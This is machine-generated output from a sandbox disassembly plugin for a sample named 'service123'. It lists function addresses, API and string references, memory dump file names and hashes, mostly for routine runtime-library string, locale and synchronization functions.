Opcode ID: cc24e36c3588ad58b5b836dcd928e1f5afb59556afef85bfd68d217343291ec0
Instruction ID: d6952ecea6f528e34fe1bc6e6bc17464ec7454aa1fbc74f44aa6eb28aef56b37
Opcode Fuzzy Hash: cc24e36c3588ad58b5b836dcd928e1f5afb59556afef85bfd68d217343291ec0
Instruction Fuzzy Hash: 910121B18052159BCB10BF7CB94921D7FF4AB44750F42853ED58987210E77D8825CB97

Function 6C9D13E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 6C9D13F0
LoadLibraryA.KERNEL32 ref: 6C9D1406
GetProcAddress.KERNEL32 ref: 6C9D1425
GetProcAddress.KERNEL32 ref: 6C9D1437

Strings

__deregister_frame_info, xrefs: 6C9D142C
__register_frame_info, xrefs: 6C9D141A
libgcc_s_dw2-1.dll, xrefs: 6C9D13E9, 6C9D13FF

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: __deregister_frame_info$__register_frame_info$libgcc_s_dw2-1.dll
API String ID: 384173800-1835852900
Opcode ID: abc5e413017cdd83c724ec0fec6a51f2cbbc618efeeca2907e44eccdd967f8ff
Instruction ID: daff8cbb04daf791515483729eb78c8f3f350ab3be68173eb000bfdca6b10e1c
Opcode Fuzzy Hash: abc5e413017cdd83c724ec0fec6a51f2cbbc618efeeca2907e44eccdd967f8ff
Instruction Fuzzy Hash: 0E0184B39057059BCB00BFBDAA0721D7FF4AE42265F02C42DD99AA7A10E730D445CBA3

Function 6C9F73C0 Relevance: 12.2, APIs: 6, Strings: 2, Instructions: 237stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 6C9F7411
strlen.MSVCRT ref: 6C9F742B
strlen.MSVCRT ref: 6C9F747B
strlen.MSVCRT ref: 6C9F74D8
strlen.MSVCRT ref: 6C9F752C

Strings

*, xrefs: 6C9F7660
basic_string::append, xrefs: 6C9F76CA, 6C9F76D6, 6C9F76E2, 6C9F76EE

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: strlen$strcmp
String ID: *$basic_string::append
API String ID: 551667898-3732199748
Opcode ID: 826bbb649c3bc8a449bc034e158288d562c0f5e5c5bb94bee8eaf484bbbcb613
Instruction ID: 0c957c026b0974c245dd353bcbccedf5f739091a6c0c6b8f3c522c0563077dab
Opcode Fuzzy Hash: 826bbb649c3bc8a449bc034e158288d562c0f5e5c5bb94bee8eaf484bbbcb613
Instruction Fuzzy Hash: 5FA15C70A08601CFDB00DF68C1847AEBBF2BF45308F55896CD4989BB55D735E88ACB92

Function 6CA73DD0 Relevance: 12.2, APIs: 7, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 6CA73E6F
memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6CA0E9CE), ref: 6CA73ED3
memmove.MSVCRT ref: 6CA73F0B
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6CA0E9CE), ref: 6CA73F7A

Strings

basic_string::_M_replace, xrefs: 6CA740FF

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: memmove$memcpy
String ID: basic_string::_M_replace
API String ID: 3033661859-2323331477
Opcode ID: 40c9a0e00b219797800dcb092ea5284a39c148047c56d0f0f8c79cd830dcf170
Instruction ID: cab3fbd30647fa524d5e4cc91a540409550ac013775f85f7668cc25eac71809c
Opcode Fuzzy Hash: 40c9a0e00b219797800dcb092ea5284a39c148047c56d0f0f8c79cd830dcf170
Instruction Fuzzy Hash: A891253960A355CFC310DF28C08095ABBF1BF89348F16892DE5C99B724E774E985CB92

Function 6C9DE800 Relevance: 12.1, APIs: 8, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 1884a794d3d441725b09e7e72905d71cc32fb0140713b8c23ce069bb11cd822c
Instruction ID: 0024c927236f141009a04c04dc3cb89fd88f7984cc29d6648a893d42358e6465
Opcode Fuzzy Hash: 1884a794d3d441725b09e7e72905d71cc32fb0140713b8c23ce069bb11cd822c
Instruction Fuzzy Hash: F521D731944E09CFD700CE19C481A9AF7AAAF96314B16CA59D48467E18D330F8CBC7D2

Function 6C9E9BA6 Relevance: 12.1, APIs: 8, Instructions: 86clipboardCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 6C9E9BA9
IsClipboardFormatAvailable.USER32 ref: 6C9E9DDC
OpenClipboard.USER32 ref: 6C9E9DF0

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: Clipboard$AvailableCloseFormatHandleOpen
String ID:
API String ID: 518195572-0
Opcode ID: ac699b8bd2e9a445720a3b2966f2214cca3995834853b8101c4135714ddeee1f
Instruction ID: 16df91cdf36c67a0f2f22c0f0c4b6bb5aaf825fef20a8e3024018fe3799e217c
Opcode Fuzzy Hash: ac699b8bd2e9a445720a3b2966f2214cca3995834853b8101c4135714ddeee1f
Instruction Fuzzy Hash: 842153B26042018FEB05BF7CE6491AEBBF4BF56315F054A3CD89686640EB34D449CB53

Function 00791E70 Relevance: 12.1, APIs: 8, Instructions: 84COMMON

Download Yara Rule

APIs

signal.MSVCRT ref: 00791EAF
signal.MSVCRT ref: 00791EF6
signal.MSVCRT ref: 00791F0F
signal.MSVCRT ref: 00791F36
signal.MSVCRT ref: 00791F72
signal.MSVCRT ref: 00791FBF
signal.MSVCRT ref: 00791FD5
signal.MSVCRT ref: 00791FEB

Memory Dump Source

Source File: 00000005.00000002.2565535527.0000000000791000.00000020.00000001.01000000.00000005.sdmp, Offset: 00790000, based on PE: true

Associated: 00000005.00000002.2565509432.0000000000790000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565552997.000000000079A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565569379.000000000079E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565585320.00000000007A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_790000_service123.jbxd

Similarity

API ID: signal
String ID:
API String ID: 1946981877-0
Opcode ID: e2eed927d6f9ae0f2daeb1bb7b46251d20f2603a804dce774b5fbe2b796eeb47
Instruction ID: d899d872a88b4406dd8f7231d41b5a8fbeaf2e954dd65f3dd277670d7729cef5
Opcode Fuzzy Hash: e2eed927d6f9ae0f2daeb1bb7b46251d20f2603a804dce774b5fbe2b796eeb47
Instruction Fuzzy Hash: A3316F705093068AEF206F68E84532E76D1BF45358F954D0DE8C887281DB7EC8E89B13

Function 00794360 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 399COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00794378

Strings

Inf, xrefs: 00794E35, 00794E4D
NaN, xrefs: 00794D3B
@, xrefs: 00794647

Memory Dump Source

Source File: 00000005.00000002.2565535527.0000000000791000.00000020.00000001.01000000.00000005.sdmp, Offset: 00790000, based on PE: true

Associated: 00000005.00000002.2565509432.0000000000790000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565552997.000000000079A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565569379.000000000079E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565585320.00000000007A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_790000_service123.jbxd

Similarity

API ID: _errno
String ID: @$Inf$NaN
API String ID: 2918714741-141429178
Opcode ID: d82b6320f5a27e2be10423fdb79f8bf07ac83ba33eddcd5ae204f4c75c0c538b
Instruction ID: c47beddcd866776b52045f4fd0dc9165921bcc0b9552245456c42b64e08c7e7f
Opcode Fuzzy Hash: d82b6320f5a27e2be10423fdb79f8bf07ac83ba33eddcd5ae204f4c75c0c538b
Instruction Fuzzy Hash: D1F1B17560C3858BDF308F24E490BABBBE1BB85314F158A1DE9DD87391D7399906CB82

Function 6C9E4A30 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 399COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 6C9E4A48

Strings

NaN, xrefs: 6C9E540B
Inf, xrefs: 6C9E5505, 6C9E551D
@, xrefs: 6C9E4D17

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: _errno
String ID: @$Inf$NaN
API String ID: 2918714741-141429178
Opcode ID: a43141b6d8d79e1aca66b6cc976667471fd14e5310f12ac41e3a967d4dfef8b8
Instruction ID: a7e154d501b0b78aedae8d8c827a80a2df36828cf9cc4be764782549dc777426
Opcode Fuzzy Hash: a43141b6d8d79e1aca66b6cc976667471fd14e5310f12ac41e3a967d4dfef8b8
Instruction Fuzzy Hash: 8CF19F7160C3858BD7228F28C45079BBBE6BFA9318F158A1DE9DC87781D735D905CB42

Function 00793160 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 295COMMON

Download Yara Rule

Strings

@, xrefs: 0079342A
0, xrefs: 007934C6

Memory Dump Source

Source File: 00000005.00000002.2565535527.0000000000791000.00000020.00000001.01000000.00000005.sdmp, Offset: 00790000, based on PE: true

Associated: 00000005.00000002.2565509432.0000000000790000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565552997.000000000079A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565569379.000000000079E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565585320.00000000007A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_790000_service123.jbxd

Similarity

API ID:
String ID: 0$@
API String ID: 0-1545510068
Opcode ID: e57f9d77be607eb7be2d65c7f691f863806e0b74bc638be5844c6890f5152d77
Instruction ID: 3057d053d25f44a03500f8671a4ce001549ac19d361a13605fe6a01d19d918a6
Opcode Fuzzy Hash: e57f9d77be607eb7be2d65c7f691f863806e0b74bc638be5844c6890f5152d77
Instruction Fuzzy Hash: B7C15871A006198BDF15CF6CE48479DBBF2BF88314F298259E858AB395D738ED41CB90

Function 6C9E3830 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 295COMMON

Download Yara Rule

Strings

0, xrefs: 6C9E3B96
@, xrefs: 6C9E3AFA

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID:
String ID: 0$@
API String ID: 0-1545510068
Opcode ID: 852fd2e7f322feda59a9287ec6fcafc659018383277beee50283a5623e34e20d
Instruction ID: 43ecea92ba23cea9cf68e4cc5b184d1be80ec817d5f34c241a57d1fc331df82b
Opcode Fuzzy Hash: 852fd2e7f322feda59a9287ec6fcafc659018383277beee50283a5623e34e20d
Instruction Fuzzy Hash: 40C18A71E042259BCB06CF7CC48479DBBF5BF99314F298259E858AB7A5D334E841CB90

Function 6C9FB810 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 212stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C9FB836
memcmp.MSVCRT ref: 6C9FB85A
memcmp.MSVCRT ref: 6C9FB8CD
memcmp.MSVCRT ref: 6C9FB93F

Part of subcall function 6CA9ADB0: strlen.MSVCRT ref: 6CA9ADBE

memcmp.MSVCRT ref: 6C9FB9D7

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C9FB881, 6C9FB8F2, 6C9FB965, 6C9FB9FE, 6C9FBA1A
basic_string::compare, xrefs: 6C9FB879, 6C9FB8EA, 6C9FB95D, 6C9FB9F6, 6C9FBA12

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: memcmp$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
API String ID: 3738950036-1697194757
Opcode ID: d6a363a9d35245a604c39d6b789ee86b2299d998d1f210e1887975af5fcc6ecf
Instruction ID: bb9090e9b289d24eb9fc78d5eadc6d15890aa4a2f0f0ed78556c16f35eced526
Opcode Fuzzy Hash: d6a363a9d35245a604c39d6b789ee86b2299d998d1f210e1887975af5fcc6ecf
Instruction Fuzzy Hash: F36137B26093159FC300DF29C98195ABBF9AFD8648F15892EE4C887710D371D885DB92

Function 6C9F7710 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 211stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CA43320: memset.MSVCRT ref: 6CA43365

strcmp.MSVCRT ref: 6C9F7771
strlen.MSVCRT ref: 6C9F778C
strlen.MSVCRT ref: 6C9F77D3
strlen.MSVCRT ref: 6C9F7844
strlen.MSVCRT ref: 6C9F78B2

Strings

*, xrefs: 6C9F7990

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: strlen$memsetstrcmp
String ID: *
API String ID: 3639840916-163128923
Opcode ID: eefd688c707b447c835983480931ccaf222f5b3509e3404c8ed218a10c579e3e
Instruction ID: 55109d65b57bb9c7c7d327d08278b1433530b0d39a8ebaee36267798e5f6379c
Opcode Fuzzy Hash: eefd688c707b447c835983480931ccaf222f5b3509e3404c8ed218a10c579e3e
Instruction Fuzzy Hash: F78145B5A056118FDB00DF29C588A9EFBF9FF89304F0185ADD8959B710D735E84ACB82

Function 6C9DE8E0 Relevance: 10.7, APIs: 7, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 6949fccd0a9c3e9d3ac8c5b45f2aac2a255c09ca815fc16772279bff97c29dd2
Instruction ID: 949d6d55a168ec0bb528a91443b95ed3a83e4b80464e277ab73b624db17d3549
Opcode Fuzzy Hash: 6949fccd0a9c3e9d3ac8c5b45f2aac2a255c09ca815fc16772279bff97c29dd2
Instruction Fuzzy Hash: 90518D7050AB058FC710CF59C08065AF7E8BF99308F46CA9AE898AB744D334F946CB96

Function 6C9DE340 Relevance: 10.6, APIs: 7, Instructions: 126synchronizationCOMMON

Download Yara Rule

APIs

CreateSemaphoreW.KERNEL32 ref: 6C9DE487
WaitForSingleObject.KERNEL32 ref: 6C9DE4C8

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: CreateObjectSemaphoreSingleWait
String ID:
API String ID: 1168595426-0
Opcode ID: 699b44b417e49a0d3d7782e886e3d3d8f5f388e072c1973ba6a0df886e15ee10
Instruction ID: 1013191bf97085980f72a6c62895bb66c199660aa371d53ec7f978bbbf0ff4ae
Opcode Fuzzy Hash: 699b44b417e49a0d3d7782e886e3d3d8f5f388e072c1973ba6a0df886e15ee10
Instruction Fuzzy Hash: 3E513B707057028BEB18DF7AD58472ABBF8AF06308F12C52CD865A7B45D730E446CBA2

Function 6C9E01F0 Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C9E0209
memcpy.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6C9E022D
malloc.MSVCRT ref: 6C9E0247
memset.MSVCRT ref: 6C9E0275
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D7E

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: abort$malloc$memcpymemset
String ID:
API String ID: 334492700-0
Opcode ID: e6d7780d917140ca2a5588e03258049156473324d9afcb76f04c1c6ed51653e4
Instruction ID: 31555e65d0023ff686f85a16f9126e9cf9ff4401c5c6446bf54b28c1cacee59d
Opcode Fuzzy Hash: e6d7780d917140ca2a5588e03258049156473324d9afcb76f04c1c6ed51653e4
Instruction Fuzzy Hash: 351151B26057559FD701AFA9E4848D9FBE8EF69298F06897DD848C7B00E730D508CB61

Function 00798120 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0079812C
GetProcAddress.KERNEL32 ref: 0079814C
GetProcAddress.KERNEL32 ref: 0079818B

Strings

__lc_codepage, xrefs: 00798180
msvcrt.dll, xrefs: 00798125
___lc_codepage_func, xrefs: 00798144

Memory Dump Source

Source File: 00000005.00000002.2565535527.0000000000791000.00000020.00000001.01000000.00000005.sdmp, Offset: 00790000, based on PE: true

Associated: 00000005.00000002.2565509432.0000000000790000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565552997.000000000079A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565569379.000000000079E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565585320.00000000007A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_790000_service123.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ___lc_codepage_func$__lc_codepage$msvcrt.dll
API String ID: 667068680-1145701848
Opcode ID: e60c39c92a1933612de63b4f8867a1d64f359cbdaba530a99b978c6ef9c091f0
Instruction ID: 32d7a78c72b8cd46e98cf2ca79cb57c012bd884e732ea342869651a4ea2208da
Opcode Fuzzy Hash: e60c39c92a1933612de63b4f8867a1d64f359cbdaba530a99b978c6ef9c091f0
Instruction Fuzzy Hash: F9F049B08852159BDF50AB7C7D4524B7AE0AA05310F05853FC885C7300EA7D8856CBA3

Function 6C9E9171 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 6C9E917C
GetProcAddress.KERNEL32 ref: 6C9E919C
GetProcAddress.KERNEL32 ref: 6C9E91DB

Strings

__lc_codepage, xrefs: 6C9E91D0
msvcrt.dll, xrefs: 6C9E9175
___lc_codepage_func, xrefs: 6C9E9194

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ___lc_codepage_func$__lc_codepage$msvcrt.dll
API String ID: 667068680-1145701848
Opcode ID: 2a3bd8563d95c736a49644990f19f85612f14ad052a9e2b931daa60520cb369e
Instruction ID: dba139f418ac0b5dbe3a0980fe1844120df1b3ea20bdd20406f48c41624a3a5f
Opcode Fuzzy Hash: 2a3bd8563d95c736a49644990f19f85612f14ad052a9e2b931daa60520cb369e
Instruction Fuzzy Hash: 92F096B19453028FAB01BF7C6A4A38A7BF8AE19210F42453DC899D7601E371C551CBE3

Function 6C9DEA9B Relevance: 10.5, APIs: 7, Instructions: 21COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D60
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D65
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6A
